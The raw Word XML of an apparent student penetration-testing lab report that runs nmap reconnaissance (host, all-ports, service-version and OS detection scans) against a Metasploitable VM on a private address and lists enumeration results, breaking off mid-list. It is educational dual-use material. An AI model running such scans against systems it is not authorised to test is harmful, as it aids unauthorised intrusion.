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8CC0B" w14:textId="77777777" w:rsidR="00ED26FD" w:rsidRPr="00ED26FD" w:rsidRDefault="00ED26FD" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED26FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Network Penetration Testing with Real-World Exploits and Security Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D8D888" w14:textId="77777777" w:rsidR="00ED26FD" w:rsidRDefault="00ED26FD" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B7FFDB" w14:textId="6CAD49CD" w:rsidR="004873CC" w:rsidRDefault="004873CC" w:rsidP="002B5850">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004873CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Project </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004873CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>objectives</w:t>
      </w:r>
      <w:r w:rsidR="00ED26FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A7EA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005A7EA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="002B5850">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBB7FF9" w14:textId="4BAD85CD" w:rsidR="005A7EA6" w:rsidRDefault="005A7EA6" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377936F4" w14:textId="77777777" w:rsidR="005A7EA6" w:rsidRPr="00656DB4" w:rsidRDefault="005A7EA6" w:rsidP="005A7EA6">
      <w:r w:rsidRPr="00656DB4">
        <w:t>In today's interconnected digital landscape, network security is a critical concern for organizations of all sizes. With increasing threats from cybercriminals, it is essential to proactively test and secure network infrastructures. Network Penetration Testing is a method of ethically simulating attacks to uncover vulnerabilities in network systems before malicious actors can exploit them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403DF6B9" w14:textId="77777777" w:rsidR="005A7EA6" w:rsidRPr="00656DB4" w:rsidRDefault="005A7EA6" w:rsidP="005A7EA6"/>
    <w:p w14:paraId="31553944" w14:textId="242EE702" w:rsidR="005A7EA6" w:rsidRPr="00656DB4" w:rsidRDefault="005A7EA6" w:rsidP="005A7EA6">
      <w:r w:rsidRPr="00656DB4">
        <w:t>This project explores real-world network penetration testing, where commonly used attack techniques and publicly known exploits are applied to identify security flaws. The project doesn't stop at detection—it also emphasizes security remediation, offering practical solutions and best practices to fix the issues uncovered. By doing so, it bridges the gap between offensive testing and defensive security strategies, ensuring a well-rounded approach to cyber resilience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF2320C" w14:textId="77777777" w:rsidR="005A7EA6" w:rsidRDefault="005A7EA6" w:rsidP="005A7EA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A1BDB9" w14:textId="55E5BBCC" w:rsidR="005A7EA6" w:rsidRDefault="005A7EA6" w:rsidP="005A7EA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>THEORY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F7E01C" w14:textId="77777777" w:rsidR="005A7EA6" w:rsidRPr="00656DB4" w:rsidRDefault="005A7EA6" w:rsidP="005A7EA6">
      <w:r w:rsidRPr="00656DB4">
        <w:t>Network Penetration Testing is a structured process used to evaluate the security of a network by mimicking real cyberattacks. It typically involves five main phases: reconnaissance, scanning, enumeration, exploitation, and reporting. The aim is to reveal weaknesses such as open ports, vulnerable services, misconfigurations, and outdated software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5D7801" w14:textId="77777777" w:rsidR="005A7EA6" w:rsidRPr="00656DB4" w:rsidRDefault="005A7EA6" w:rsidP="005A7EA6"/>
    <w:p w14:paraId="3ED16C12" w14:textId="77777777" w:rsidR="005A7EA6" w:rsidRPr="00656DB4" w:rsidRDefault="005A7EA6" w:rsidP="005A7EA6">
      <w:r w:rsidRPr="00656DB4">
        <w:t>In this project, real-world exploits—such as known CVEs and poor security configurations—are used to simulate realistic attack scenarios. Tools like Metasploit, Nmap, and Burp Suite help perform these simulated attacks effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032BC0BD" w14:textId="77777777" w:rsidR="005A7EA6" w:rsidRPr="00656DB4" w:rsidRDefault="005A7EA6" w:rsidP="005A7EA6"/>
    <w:p w14:paraId="7F9DD30C" w14:textId="408DD01A" w:rsidR="005A7EA6" w:rsidRPr="00656DB4" w:rsidRDefault="005A7EA6" w:rsidP="005A7EA6">
      <w:r w:rsidRPr="00656DB4">
        <w:t>After identifying vulnerabilities, security remediation is performed. This includes applying patches, updating configurations, hardening system settings, and improving access controls. The end goal is to not only demonstrate how attackers can break in, but also how to prevent such breaches through proper security measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E38A2D" w14:textId="1D75B0CE" w:rsidR="004873CC" w:rsidRPr="00656DB4" w:rsidRDefault="004873CC" w:rsidP="004873CC"/>
    <w:p w14:paraId="2DDF178D" w14:textId="2C5B05D6" w:rsidR="004873CC" w:rsidRPr="004873CC" w:rsidRDefault="004873CC" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004873CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Project requirements </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A98F11B" w14:textId="1BC80E97" w:rsidR="004873CC" w:rsidRDefault="004873CC" w:rsidP="004873CC">
      <w:r>
        <w:t>Two Operating System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7C5D48" w14:textId="45739E97" w:rsidR="004873CC" w:rsidRDefault="004873CC" w:rsidP="004873CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kali Linux (Attacking machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6682DD60" w14:textId="3A5DB9EF" w:rsidR="004873CC" w:rsidRDefault="004873CC" w:rsidP="004873CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> machine </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( Target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Machine) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A122120" w14:textId="77777777" w:rsidR="004873CC" w:rsidRPr="004873CC" w:rsidRDefault="004873CC" w:rsidP="004873CC"/>
    <w:p w14:paraId="62974F64" w14:textId="1585F6A7" w:rsidR="004873CC" w:rsidRPr="004873CC" w:rsidRDefault="004873CC" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004873CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tools </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004873CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
      <w:r w:rsidR="005A7EA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="75EBC883" w14:textId="724DF9BA" w:rsidR="004873CC" w:rsidRDefault="005A7EA6" w:rsidP="004873CC">
      <w:r>
        <w:t>Nmap: For network scanning, port discovery, OS detection, and service enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC691B7" w14:textId="541FFA90" w:rsidR="005A7EA6" w:rsidRDefault="005A7EA6" w:rsidP="004873CC">
      <w:r>
        <w:t>Metasploit framework: For exploiting known vulnerabilities in services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444D8A8B" w14:textId="53F50D3B" w:rsidR="005A7EA6" w:rsidRDefault="005A7EA6" w:rsidP="004873CC">
      <w:r>
        <w:t>John the Ripper: For cracking password hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB283C" w14:textId="77777777" w:rsidR="005A7EA6" w:rsidRPr="004873CC" w:rsidRDefault="005A7EA6" w:rsidP="004873CC"/>
    <w:p w14:paraId="24499DDE" w14:textId="0A4DBEC9" w:rsidR="004873CC" w:rsidRPr="004873CC" w:rsidRDefault="004873CC" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004873CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tasks</w:t>
      </w:r>
      <w:r w:rsidR="005A7EA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="64BC26EB" w14:textId="3301A150" w:rsidR="004873CC" w:rsidRDefault="004873CC" w:rsidP="004873CC">
      <w:r w:rsidRPr="004873CC">
        <w:t>Network Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2FEBF8" w14:textId="77777777" w:rsidR="00225611" w:rsidRPr="00225611" w:rsidRDefault="00225611" w:rsidP="00225611">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225611">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 1: Basic Network Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A36F8DF" w14:textId="77777777" w:rsidR="00147793" w:rsidRDefault="00225611" w:rsidP="00225611">
      <w:r w:rsidRPr="00225611">
        <w:t>Step 1: Open a terminal on your Kali Linux machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A6FC72" w14:textId="77777777" w:rsidR="00147793" w:rsidRDefault="00225611" w:rsidP="00225611">
      <w:r w:rsidRPr="00225611">
        <w:t xml:space="preserve">Step 2: Run a basic scan on your local network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B44AA99" w14:textId="7F5576F3" w:rsidR="00225611" w:rsidRPr="00225611" w:rsidRDefault="005A7EA6" w:rsidP="00225611">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00225611" w:rsidRPr="00225611">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00225611" w:rsidRPr="00225611">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00147793">
        <w:t xml:space="preserve">-v </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.80.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD86CF2" w14:textId="751D5F1E" w:rsidR="00C51A06" w:rsidRDefault="005A7EA6" w:rsidP="00225611">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02D703D4" wp14:editId="3590D838">
            <wp:extent cx="6096000" cy="6772275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="59814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42417" name="Picture 598142417"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096855" cy="6773225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E88A5DF" w14:textId="77777777" w:rsidR="00C51A06" w:rsidRPr="00225611" w:rsidRDefault="00C51A06" w:rsidP="00225611"/>
    <w:p w14:paraId="65CCF485" w14:textId="400F99C0" w:rsidR="00225611" w:rsidRPr="00225611" w:rsidRDefault="00225611" w:rsidP="00225611">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225611">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r w:rsidR="005A7EA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00225611">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: Scanning </w:t>
      </w:r>
      <w:r w:rsidR="00147793">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>for hidden</w:t>
      </w:r>
      <w:r w:rsidRPr="00225611">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CD7108" w14:textId="6528093A" w:rsidR="00225611" w:rsidRPr="00225611" w:rsidRDefault="00225611" w:rsidP="00225611">
      <w:r w:rsidRPr="00225611">
        <w:t xml:space="preserve">Step 1: To scan for </w:t>
      </w:r>
      <w:r w:rsidR="00147793">
        <w:t>hidden</w:t>
      </w:r>
      <w:r w:rsidRPr="00225611">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00225611">
        <w:t>ports ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009132E1">
        <w:t xml:space="preserve"> we have to scan whole range of ports on that specific targeted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009132E1">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009132E1">
        <w:t xml:space="preserve"> address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E75E3CD" w14:textId="1E823495" w:rsidR="00225611" w:rsidRDefault="005A7EA6" w:rsidP="00225611">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00225611" w:rsidRPr="00225611">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00225611" w:rsidRPr="00225611">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009132E1">
        <w:t xml:space="preserve">-v </w:t>
      </w:r>
      <w:r w:rsidR="00225611" w:rsidRPr="00225611">
        <w:t>-p</w:t>
      </w:r>
      <w:r w:rsidR="009132E1">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00225611" w:rsidRPr="00225611">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.80.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5E2CCB" w14:textId="77777777" w:rsidR="005A7EA6" w:rsidRDefault="005A7EA6" w:rsidP="00225611"/>
    <w:p w14:paraId="619A8AC9" w14:textId="6ACCBBD6" w:rsidR="005A7EA6" w:rsidRPr="00225611" w:rsidRDefault="00210A1B" w:rsidP="00225611">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B4EE632" wp14:editId="302B1E17">
            <wp:extent cx="5981700" cy="7477125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="151458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511" name="Picture 151458511"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5982538" cy="7478173"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C080C91" w14:textId="61D01649" w:rsidR="00225611" w:rsidRPr="00225611" w:rsidRDefault="00225611" w:rsidP="00225611">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225611">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r w:rsidR="00210A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00225611">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: Service Version Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD6DAA3" w14:textId="77777777" w:rsidR="00225611" w:rsidRPr="00225611" w:rsidRDefault="00225611" w:rsidP="00225611">
      <w:r w:rsidRPr="00225611">
        <w:t>Step 1: Use the -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00225611">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00225611">
        <w:t xml:space="preserve"> option to detect the version of services running on open ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A5B5A2" w14:textId="709A8938" w:rsidR="00886223" w:rsidRDefault="00210A1B" w:rsidP="00210A1B">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00225611" w:rsidRPr="00225611">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00225611" w:rsidRPr="00225611">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00886223">
        <w:t xml:space="preserve">-v </w:t>
      </w:r>
      <w:r w:rsidR="00225611" w:rsidRPr="00225611">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00225611" w:rsidRPr="00225611">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00225611" w:rsidRPr="00225611">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.80.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F1D4EA" w14:textId="48EE49EB" w:rsidR="00210A1B" w:rsidRDefault="00210A1B" w:rsidP="00210A1B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78969010" wp14:editId="1E88AA08">
            <wp:extent cx="5020376" cy="7325747"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
            <wp:docPr id="1685534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34892" name="Picture 1685534892"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5020376" cy="7325747"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5FF07F" w14:textId="73996E7E" w:rsidR="00886223" w:rsidRPr="00225611" w:rsidRDefault="00886223" w:rsidP="00225611"/>
    <w:p w14:paraId="770792F8" w14:textId="43E6372B" w:rsidR="00225611" w:rsidRPr="00225611" w:rsidRDefault="00225611" w:rsidP="00225611">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225611">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r w:rsidR="00210A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00225611">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: Operating System Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789E1EB7" w14:textId="77777777" w:rsidR="00225611" w:rsidRPr="00225611" w:rsidRDefault="00225611" w:rsidP="00225611">
      <w:r w:rsidRPr="00225611">
        <w:t>Step 1: Use the -O option to detect the operating systems of devices on the network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCB5C1B" w14:textId="0A74B8A5" w:rsidR="00FB1F62" w:rsidRDefault="00210A1B" w:rsidP="00225611">
      <w:r>
        <w:t xml:space="preserve"> $ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00225611" w:rsidRPr="00225611">
        <w:t>map</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B130F">
        <w:t xml:space="preserve"> -v</w:t>
      </w:r>
      <w:r w:rsidR="00225611" w:rsidRPr="00225611">
        <w:t xml:space="preserve"> -O </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.80.168</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A1DD0F" w14:textId="3F4A4566" w:rsidR="00210A1B" w:rsidRDefault="00210A1B" w:rsidP="00225611">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F554162" wp14:editId="56C98B92">
            <wp:extent cx="4372585" cy="7373379"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="396877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77262" name="Picture 396877262"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4372585" cy="7373379"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DD162F" w14:textId="29EA8805" w:rsidR="00C51A06" w:rsidRPr="00210A1B" w:rsidRDefault="00C51A06" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00210A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r w:rsidR="00210A1B" w:rsidRPr="00210A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00210A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40299FA9" w14:textId="7A6E0280" w:rsidR="002B130F" w:rsidRDefault="002B130F" w:rsidP="00CF60DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF60DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target IP Address</w:t>
      </w:r>
      <w:r w:rsidR="00210A1B" w:rsidRPr="00CF60DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00210A1B">
        <w:t>192.168.80.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639BBF68" w14:textId="090511C2" w:rsidR="002B130F" w:rsidRDefault="002B130F" w:rsidP="00CF60DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MAC Address: </w:t>
      </w:r>
      <w:r w:rsidR="00210A1B">
        <w:t>00:0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00210A1B">
        <w:t>c:29:87</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00210A1B">
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00210A1B">
        <w:t>ff:e</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00210A1B">
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690AF0BD" w14:textId="77777777" w:rsidR="002B130F" w:rsidRDefault="002B130F" w:rsidP="00CF60DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Device type: general purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C27B71" w14:textId="77777777" w:rsidR="002B130F" w:rsidRDefault="002B130F" w:rsidP="00CF60DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Running: Linux 2.6.X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370696C3" w14:textId="77777777" w:rsidR="002B130F" w:rsidRDefault="002B130F" w:rsidP="00CF60DA">
